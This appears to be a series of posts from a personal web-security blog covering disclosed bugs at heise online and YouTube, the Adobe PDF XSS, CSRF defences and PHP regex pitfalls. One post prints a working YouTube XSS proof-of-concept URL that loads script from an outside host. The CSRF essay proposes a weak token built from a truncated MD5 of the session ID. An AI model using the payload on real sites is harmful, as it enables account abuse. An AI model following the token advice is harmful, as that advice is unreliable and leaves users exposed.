A little something from heise online

A couple of days ago I came across an SQL injection vulnerability on heise online and due to the severity of this issue I decided to inform them about it immediately, what I probably wouldn't have done if it had been some kind of cross site scripting only.

Anyway, the reason I write this posting is because I'm pretty much taken with the kind of response I got. They fixed the issue and additionally sent me a letter saying thank you for the warning.

Extremely kind, thanks to Michael Wilde.

Adobe UXSS already buried in oblivion?

Universal XSS vulnerabilites truly belong to the worst weak points, since they appear unforeseeable and tend to affect a large number of applications. Given that there's no way to protect against them in advance, which makes it even more important to take action as soon as they are discovered.

This is approximately what happend in the very beginning of 2007 when Stefano Di Paola disclosed the Adboe PDF issue at 23C3. Due to this vulnerability was possible to perform XSS attacks against any website having PDF files, therefore many sites such as Google implemented a function that forced the user to download these files instead of opening them directly in the browser.

Well, finally Adobe released a patch that fixed this vulnerability, which however has never changed the fact that the majority of users most probably still runs vulnerable versions.

So why do people keep on storing directly accessible PDF files on their servers? I still find them everywhere while doing audits or simply browsing through the web.

To finish with pdp's words: danger, danger, danger

Application insecurity graphed

Today I ran across Ed Finklers weblog where he visualised the top 20 insecure PHP applications, referring to NIST NDV data. Pretty interesting, although I've always assumend that Wordpress would head such a table.

Ed is intending to keep the stats up-to-date, I really appreciate that.

YouTube is still vulnerable

When Jungsonn once wrote about the YouTube XSS I discovered a week or so ago, a short discussion came up on whether web developer as such from YouTube worked sloppy or not.

Actually I would assume that for being allowed to modify content on that site, the developer(s) need to be qualified. Otherwise YouTube or Google wouldn't have employed them, right? No, obviously wrong.

Well, let me inform you about the background on this in case you haven't seen it yet. YouTube decided to add new features, which they then announced on their blog. Unfortunately those features were vulnerable to cross site scripting attacks, which got me thinking. How comes that such a major company releases completely untested features? Don't they know or don't they care? Well, lets imagine they made a mistake because multiple dev teams just couldn't manage to work properly together.

After a week they finally fixed that particular vulnerabilty but they failed on another one on exactly the same site and the same form. Meanwhile, that one has been fixed too, since I informed them about it.

Anyway, that got me thinking again. You don't need more than one single developer to validate an incoming URL parameter. If I had been that developer I'd probably have had a look on those remaining two or three inputs too, instead of instantly closing the window after having fixed the first issue.

I don't think this is a mistake anymore, it's sloppy work and nothing else.

Preventing CSRF efficiently

Yet another blog posting about cross site request forgeries and how to prevent them, however this time slightly different and not only dealing with approaches that have already been discussed numerous times and are likely to fail under certain well known circumstances. It's actually difficult to start on this but I'm prepared with a cup of coffee.

If you aren't familar with terms such as CSRF or session riding yet, please use Google or have a look on the CSRF FAQ, since I will skip that part.

During the last moths there has been a great deal of discussion on how to prevent cross site request forgeries and as far as I know, all of them ended confusingly and moreover imperfectly. Uninformed readers may get the impression that it's impossible to protect webapplications or - to phrase it more precisely - users, which however is not true at all. There are in fact various solutions which do work efficiently.

To provide you with a broader understanding on this matter, let's first of all talk about solutions that do not work or only to a limited degree. A lot of people suggest to use hard to guess unique tokens, embedded somewhere in the HTML source or the URL to make sure that the request is valid and intended by the user. I have to admit that this appears to be a working method but actually it isn't if you consider attack techniques that break the same-origin policy, such as cross domain Ajax due to the MHTML bug in Internet Explorer. Thus a versed attacker would gain the secret token and then trigger an authentic looking request to achieve his aim.

Next thing often recommended is checking the referer, which is insecure since referers can easily be spoofed in various ways (or simply not sent) but the reason I mention this is because you can implement this as an additional layer of security and refuse referers that are unexpected. So if implemented correctly it's a good idea to check referers.

For the sake of completeness I should probably add that using POST instead of GET is not a suitable solution at all but if you haven't realized that by yourself you should consider restarting at the very beginning.

Now as I said earlier, there are in fact ways to prevent CSRF efficiently on condition that they are implemented correctly. There is one technique that actually made me write this article and a few others which unfortunately are not liked by many people because they become lazy. One of the latter is CAPTCHA as a second factor credential, another similar approach is forcing the user to re-enter his password or thirdly sending a verification email / SMS.

Apparently those procedures are not liked by some people because they are inconveniently and decrease the usability. One the one hand that is right, at least up to a point, but on the other hand one can not equate usability with security. If you want a secure system you will sooner or later need to lower your sights somewhere else.

Of course everyone including me wants to hold those cut backs as low as possible and therefore I thought about one last approach, which can in my judgement considered to be secure. If anyone does not agree, you are more than welcome to leave a comment.

The idea is to use a session id based token which however can not be achieved neither by the MHTML bug nor any other kind of cross domain Ajax. To implement this correctly, lets just for a second reflect on the purpose of the MHTML story again. An attacker makes the victim send a request to the site in question where the victim will be authenticated due to a valid cookie. Since the attacker has full read access to that site, he is now able to grab the token and go on with his work.

The main weakness of all those former token based solutions is that they only protect security relevant tasks. If such a token was needed on any site and for any request inside the private area, there would be no way to grab a token without having it first. Got that?

The token would be generated in response to a successful authentication and then be added on each URL. I suggest to use the first five to six characters of the md5 encrypted session id in combination with a random keyword, which then will be cross checked on each request.

Unfortunately developers could fall into several traps while implementing this. Make sure that the token variable is added on every request, otherwise the system will be vulnerable. The same of course applies to XSS or redirection vulnerabilities, however these things remain in the hands of the developer and therefore are not calculable and can be under control.

So now it should be clear that it's not impossible to prevent CSRF but it requires to work accurately.

YouTube has added some features

As some of you might already have seen, YouTube added some highly interesting features last week. Unfortunately they forgot to mention the new key feature, so let me present it.

Well, enough of sarcasm. Take a look at Jungsonns blog, he has already written about what I discovered. An XSS vulnerability in one of YouTube's new sites.

Note that you need to be logged in for this expoit to work, anyway - here is the PoC:
http://www.youtube.com/groups_create?field_command=create_
group_submit&group_name=&tags=%22%3E%3Cscript/src=
http://h4k.in/j.js%3E&description=&short_name

However that's not the end. I have found two more vulnerabilities and I'm going to disclose them right here and right now.

#1 - PoC; #2 - PoC

Holes in most preg_match() filters

Since I'm a PHP programmer, I would like to point you on what Stefan Esser wrote this morning about preg_match() and common misunderstandings of regular expressions.

He states that a lot of people would have an incorrect understanding of the meta character '$' and what it actually does.

Well, usually this character is used to assert the end of a subject, which is mostly correct however what Stefan Esser points out is that without the modifier D, a string with a newline ('\n') at the end will match the regex and pass the filter as well.

Now without thinking twice about it, one may assume that a newline character passing the filter can not be that dangerous. While this might be true in a lot of cases, it's plain wrong if you want to prevent for example Http Response Splitting or Email Injection attacks.

Therefore I recommend to read the manual once again, before starting projects where regex could break your neck.

Digg, Delicious, Netscape & Technorati Hacked

Just found it, thought I'd have to point you on this in case you haven't seen it yet:

http://mybeni.rootzilla.de/

Obviously Beni put 1 and 2 together. Well done.